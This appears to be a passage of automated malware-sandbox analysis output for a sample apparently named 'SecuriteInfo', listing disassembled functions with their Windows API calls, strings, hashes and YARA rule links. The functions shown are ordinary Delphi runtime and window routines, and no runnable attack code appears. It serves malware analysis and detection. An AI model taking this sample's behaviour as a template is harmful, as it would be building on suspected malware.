lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029D7A18,029D0000,02A3A794), ref: 029D5D47
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029D7A18,029D0000), ref: 029D5D7B
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029D7A18), ref: 029D5D87
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 029D5DA9

Strings

GetLongPathNameA, xrefs: 029D5C43
\, xrefs: 029D5D59
kernel32.dll, xrefs: 029D5C30

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: e238dc73e555493e425de5acd9016b1a16de49bd440931b03b4913a020b57395
Instruction ID: 9aa4be9c21d6a136c252360dfff719b09ee799b1cef457bf67173c54f3f7a331
Opcode Fuzzy Hash: e238dc73e555493e425de5acd9016b1a16de49bd440931b03b4913a020b57395
Instruction Fuzzy Hash: B3417FB2D00659AFDB10DAE8CC88BDEB7BDAF88300F4585A5E559E7241D7709A40DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02A1FCD8 Relevance: 20.0, APIs: 13, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 60205ef879891e590670d3496db15ee3f4ea2d322f82c3311d61b3e33959e64d
Instruction ID: 5ebd5f4d4f07219634a0c3e714140818157f07c5372ada9ae7e146579135e379
Opcode Fuzzy Hash: 60205ef879891e590670d3496db15ee3f4ea2d322f82c3311d61b3e33959e64d
Instruction Fuzzy Hash: 8C023C31A44254EFDB10DBACCA84BAD77F6AB44310F1645A1E908EB2A2DF35EE45DF40

Uniqueness

Uniqueness Score: -1.00%

Function 029D5EE8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 029D5EF8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 029D5F05
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 029D5F0B
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 029D5F36
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029D5F7D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029D5F8D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029D5FB5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029D5FC5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 029D5FEB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 029D5FFB

Strings

Software\Borland\Delphi\Locales, xrefs: 029D5E48
Software\Borland\Locales, xrefs: 029D5E0C, 029D5E2A

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
Instruction ID: cc71b93e5ec36b1325a19019364ac91f6cd4130aba274a27b770f715979413f1
Opcode Fuzzy Hash: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
Instruction Fuzzy Hash: C1318772E0025C6EEB25DAB8EC46FEF77AD9B44340F4481E19648E7181DB748E84DF90

Uniqueness

Uniqueness Score: -1.00%

Function 02A1224C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 02A1225B
GetWindowPlacement.USER32(?,0000002C), ref: 02A12278
GetWindowRect.USER32(?), ref: 02A12291
GetWindowLongA.USER32(?,000000F0), ref: 02A1229F
GetWindowLongA.USER32(?,000000F8), ref: 02A122B4
ScreenToClient.USER32(00000000), ref: 02A122C1
ScreenToClient.USER32(00000000,?), ref: 02A122CC

Strings

,, xrefs: 02A12264

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
Instruction ID: 812edd54d931e63dcf1fc5a89075167bac5b41ccf71e96547edf9e322e55f8e5
Opcode Fuzzy Hash: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
Instruction Fuzzy Hash: C9112E71504351AFCB10DFACC9C4A8BB7E9AF89310F048A65BE58DB296DB31D8048B61

Uniqueness

Uniqueness Score: -1.00%

Function 02A03E00 Relevance: 10.9, APIs: 7, Instructions: 405COMMON

Download Yara Rule

APIs

SaveDC.GDI32(?), ref: 02A040D0
RestoreDC.GDI32(?,?), ref: 02A04144
GetWindowDC.USER32(?,00000000,02A04334), ref: 02A041BE
SaveDC.GDI32(?), ref: 02A041F5
RestoreDC.GDI32(?,?), ref: 02A04262
DefWindowProcA.USER32(?,?,?,?,00000000,02A04334), ref: 02A04316

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: RestoreSaveWindow$Proc
String ID:
API String ID: 1975259465-0
Opcode ID: 2c9aa75b91e5ab076232344f40d38deb7ca9727359efe34af097fff544a25e61
Instruction ID: abef190e84a39f8fc8dd99d80ea198101701b6ec6f97dde4747ff2f4de66b3c1
Opcode Fuzzy Hash: 2c9aa75b91e5ab076232344f40d38deb7ca9727359efe34af097fff544a25e61
Instruction Fuzzy Hash: 5CE10734A046059BDB10DFA9E9C49AEF7F6FF9C300B1586A5EA01A72A0CB34ED41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02A1C508 Relevance: 10.8, APIs: 7, Instructions: 332windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(00000000), ref: 02A1C5CF
SaveDC.GDI32(?), ref: 02A1C78D
RestoreDC.GDI32(?,?), ref: 02A1C7FE
GetWindowDC.USER32(00000000), ref: 02A1C86A
SaveDC.GDI32(?), ref: 02A1C8A1
RestoreDC.GDI32(?,?), ref: 02A1C905

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: RestoreSave$FocusWindow
String ID:
API String ID: 1553564791-0
Opcode ID: 3798692132c9ef391b16150f88aa6a991260356e36c6952c0ebaa3e20afa1de5
Instruction ID: ce23f97139aa2eb106fd09534aebd19251d13802605ef4bd376ade867f09b2c0
Opcode Fuzzy Hash: 3798692132c9ef391b16150f88aa6a991260356e36c6952c0ebaa3e20afa1de5
Instruction Fuzzy Hash: 0EC15A31B80104EFCB14DB68D995ABEB3F7AB48334F1544A2E804AB294DF30EE41DB56

Uniqueness

Uniqueness Score: -1.00%

Function 02A23990 Relevance: 9.1, APIs: 6, Instructions: 89windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 02A23998
SetActiveWindow.USER32(?,?,?,?,02A23392,00000000,02A23866), ref: 02A239A9
IsWindowEnabled.USER32(00000000), ref: 02A239CC
DefWindowProcA.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,02A23392,00000000,02A23866), ref: 02A239E5
SetWindowPos.USER32(?,00000000,00000000,?,?,02A23392,00000000,02A23866), ref: 02A23A2B
SetFocus.USER32(00000000,?,00000000,00000000,?,?,02A23392,00000000,02A23866), ref: 02A23A79

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Window$ActiveEnabledFocusIconicProc
String ID:
API String ID: 848842217-0
Opcode ID: 729cb8341e4ced4178828a2c799a23bc294c69fb114a385391de6376fa371b73
Instruction ID: c4eb7dafe1db6890bc560d25a96d0eb9be17504f585077fb5be9c88741722226
Opcode Fuzzy Hash: 729cb8341e4ced4178828a2c799a23bc294c69fb114a385391de6376fa371b73
Instruction Fuzzy Hash: 773141707402509BEF24AB6CCEC5BA937A9AF46704F0844F1EE04DF296CF79E8488B14

Uniqueness

Uniqueness Score: -1.00%

Function 02A11920 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 02A1195F
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 02A1197D
GetWindowPlacement.USER32(?,0000002C), ref: 02A119B3
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 02A119D7

Strings

,, xrefs: 02A119A1

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: e2cec1a54e07971b93f925069750258acd49cbfa2f7c93dd395129310c2fb0b5
Instruction ID: 8897da04a72fe805c756cf069314899d5df9d2c5787ef8342c227f3ed45d3a13
Opcode Fuzzy Hash: e2cec1a54e07971b93f925069750258acd49cbfa2f7c93dd395129310c2fb0b5
Instruction Fuzzy Hash: EF212F716002149BCF14EFA9D9C0ADEB7A9AF49324F008465FE28DF246DB71E905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A238CC Relevance: 7.6, APIs: 5, Instructions: 62windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 02A238D3
SetActiveWindow.USER32(?,?,?,02A23385,00000000,02A23866), ref: 02A238EB

Part of subcall function 02A22F58: EnumWindows.USER32(Function_00052EE8,00000000), ref: 02A22F82
Part of subcall function 02A22F58: ShowOwnedPopups.USER32(00000000,?), ref: 02A22FB1

IsWindowEnabled.USER32(00000000), ref: 02A23917
SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,02A23385,00000000,02A23866), ref: 02A2394A
DefWindowProcA.USER32(?,00000112,0000F020,00000000,?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,02A23385), ref: 02A2395F

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Window$ActiveEnabledEnumIconicOwnedPopupsProcShowWindows
String ID:
API String ID: 2995439034-0
Opcode ID: b0676c7339367519e0a01872b215eba6086a352b12c103765656a25fd8002925
Instruction ID: b4aa17bac5972095d54c749539a7ae2d1ab86d8f9ee6a82c2afd0c3810871ab8
Opcode Fuzzy Hash: b0676c7339367519e0a01872b215eba6086a352b12c103765656a25fd8002925
Instruction Fuzzy Hash: E711FE707402109BDF54EF6DCEC5B9977AAAF45304F0840A5BE04EF19ADB79D8449F10

Uniqueness

Uniqueness Score: -1.00%

Function 029FAEA0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

MonitorFromWindow, xrefs: 029FAEB7

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AddressProc
String ID: MonitorFromWindow
API String ID: 190572456-2842599566
Opcode ID: 8f217607c4b361a66789ab67a80147f82ba4dda35719bc1f39190e20dd767a2a
Instruction ID: 3ab4b3a8dcbe98ea0903a0f4e8e6991e18d27cf1782d9a028fc82024cf0252eb
Opcode Fuzzy Hash: 8f217607c4b361a66789ab67a80147f82ba4dda35719bc1f39190e20dd767a2a
Instruction Fuzzy Hash: 9A01A9729401185B87C0EA94DC849FFB39DDF45310B844822FA58E7241EF34DD12D7E5

Uniqueness

Uniqueness Score: -1.00%

Function 02A459D6 Relevance: 5.1, Strings: 2, Instructions: 2575COMMON

Download Yara Rule

Strings

, xrefs: 02A47DFA
c, xrefs: 02A478C1

Memory Dump Source

Source File: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $c
API String ID: 0-3797896886
Opcode ID: b967fa5f2c03492c02a443886e67412a232a1d2e3eeeb79c24c99ec0061bd16b
Instruction ID: ec7cd0b20941313e672ee21e32b016b4b36928f1326cf85394533cdf69ebb358
Opcode Fuzzy Hash: b967fa5f2c03492c02a443886e67412a232a1d2e3eeeb79c24c99ec0061bd16b
Instruction Fuzzy Hash: 92230030940314AFDB31DF68CD80BBEB7B6AF85704F44855AE90966285DF74EA84CF25

Uniqueness

Uniqueness Score: -1.00%

Function 02A2245C Relevance: 4.5, APIs: 3, Instructions: 33synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02A22468
GetCursorPos.USER32(?), ref: 02A22485
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 02A224A5

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CurrentCursorObjectSingleThreadWait
String ID:
API String ID: 1359611202-0
Opcode ID: b92f98a9c018601bfe18c996d78c31ce5b385205acf9cc2f5e59c13bdf51432c
Instruction ID: 72c966eb4cdb390a16fe65e1cc69e5ab2816d372f3cbb06a184f10f924cbbf62
Opcode Fuzzy Hash: b92f98a9c018601bfe18c996d78c31ce5b385205acf9cc2f5e59c13bdf51432c
Instruction Fuzzy Hash: BCF08C31584218DBEB24FBACF9C9B9973FDEB00310F408962E910DA1D2EF75A488DA15

Uniqueness

Uniqueness Score: -1.00%

Function 02A4906B Relevance: 4.2, Strings: 3, Instructions: 464COMMON

Download Yara Rule

Strings

(, xrefs: 02A493FE
(, xrefs: 02A4940F
(((, xrefs: 02A4942E

Memory Dump Source

Source File: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ($($(((
API String ID: 0-2102698497
Opcode ID: 70f26961da04983359bca1248e5d54bef9d1d0e3906da48a8b51b758dccf3dc3
Instruction ID: 2bc093c569f31d9544b2902f3d87a41de2f7df2708c3167e329d6c4af8c74a91
Opcode Fuzzy Hash: 70f26961da04983359bca1248e5d54bef9d1d0e3906da48a8b51b758dccf3dc3
Instruction Fuzzy Hash: 54E1C030A44116AFEB18DF69CD84B7B77A7DFC5320F14C269E815AB2C9DE349911CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A4AACF Relevance: 3.5, Strings: 2, Instructions: 1000COMMON

Download Yara Rule

Strings

, xrefs: 02A4B47A
@, xrefs: 02A4B892

Memory Dump Source

Source File: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: ef220ad4fc2a88b6fdae843f46c214da83f6911c8539a88788760522f9eb5a8f
Instruction ID: 338df66387d49cecdf695d6a019ef8505de7456f516636bca1996c8e0d7ddb0f
Opcode Fuzzy Hash: ef220ad4fc2a88b6fdae843f46c214da83f6911c8539a88788760522f9eb5a8f
Instruction Fuzzy Hash: CD722D70A80725AAEB319F64CE86FAF36A7EF85318F044866FD01A94D6DF74C501CA35

Uniqueness

Uniqueness Score: -1.00%

Function 02A0F140 Relevance: 3.1, APIs: 2, Instructions: 97windowCOMMON

Download Yara Rule

APIs

GetMessagePos.USER32 ref: 02A0F14F
GetKeyboardState.USER32(?,?,?,?,02A0F6C4), ref: 02A0F24C

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: KeyboardMessageState
String ID:
API String ID: 3083355189-0
Opcode ID: 9a109fd4098c8cc38e517da96156ca9f784df6a54854a0791d71768ddeba3bee
Instruction ID: 7ce77e96aa40bf72970552506c8ca525f14b1c738ba0d7a852c9f110f158eb79
Opcode Fuzzy Hash: 9a109fd4098c8cc38e517da96156ca9f784df6a54854a0791d71768ddeba3bee
Instruction Fuzzy Hash: BD318D755083419EC338DF78E5C579ABBE5AB8D314F004A2DE998E2A80EF74C904CB96

Uniqueness

Uniqueness Score: -1.00%

Function 02A11018 Relevance: 3.1, APIs: 2, Instructions: 64windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 02A11050
GetCapture.USER32 ref: 02A11059

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: a8f87af678ed1b0e06f0ca06604030712470c8c3227d9b7e5dbfd9900ce2a7c0
Instruction ID: cc96760d6c7d41c90a8048bfac7891949ffab7ea57cc7470570e047b95f8d1f2
Opcode Fuzzy Hash: a8f87af678ed1b0e06f0ca06604030712470c8c3227d9b7e5dbfd9900ce2a7c0
Instruction Fuzzy Hash: F9116035F042099F9B20DB68C6D4AA9B3EAAF04324F144475E508EF351EF71ED409B90

Uniqueness

Uniqueness Score: -1.00%

Function 029F3458 Relevance: 3.0, APIs: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,029F34F4), ref: 029F3478
FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,029F34F4), ref: 029F349E

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 69a026fb5a83c92fde96dd4e576e3f3653caa3638f18df487680215a2e83a1b4
Instruction ID: d82aa3febe24a92116b0fc8793b7d70ce37e8e511bea51d575e257f66176aed4
Opcode Fuzzy Hash: 69a026fb5a83c92fde96dd4e576e3f3653caa3638f18df487680215a2e83a1b4
Instruction Fuzzy Hash: 1A01A7707442455BE7A2EB70CC81BE973ADEB98704F8180F5EB48E76C0EBB859808E14

Uniqueness

Uniqueness Score: -1.00%

Function 029D8F58 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 029D8F79

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 191ca3f66228928a77bd306299e92db161272771861cde97e417a21d7851d906
Instruction ID: 66b0060a891d1eedebfbb33d15f1e9d0d1061628bc057e677a6bd64c67c7f55b
Opcode Fuzzy Hash: 191ca3f66228928a77bd306299e92db161272771861cde97e417a21d7851d906
Instruction Fuzzy Hash: 3D111EB5E00209AF9B00CF99C881DAFF7FAFFC8310B54C569A408E7250E6319A01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 029DB8C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029DB8E2

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 2c53b1a2239317bfc178ecae58eec27d8364ed45474992c4285a8de5d7b9ac4e
Instruction ID: f272fc31f4bd534a5ca40b626397ee75351cfe9058e8c2d6ceb4f50b43c6b329
Opcode Fuzzy Hash: 2c53b1a2239317bfc178ecae58eec27d8364ed45474992c4285a8de5d7b9ac4e
Instruction Fuzzy Hash: 01E0D83170421857D710A5699C91AFA735D979C310F00826ABA48C7344EFB09D905BE4

Uniqueness

Uniqueness Score: -1.00%

Function 029DB910 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,029DD07E,00000000,029DD297,?,?,00000000,00000000), ref: 029DB923

Memory Dump Source

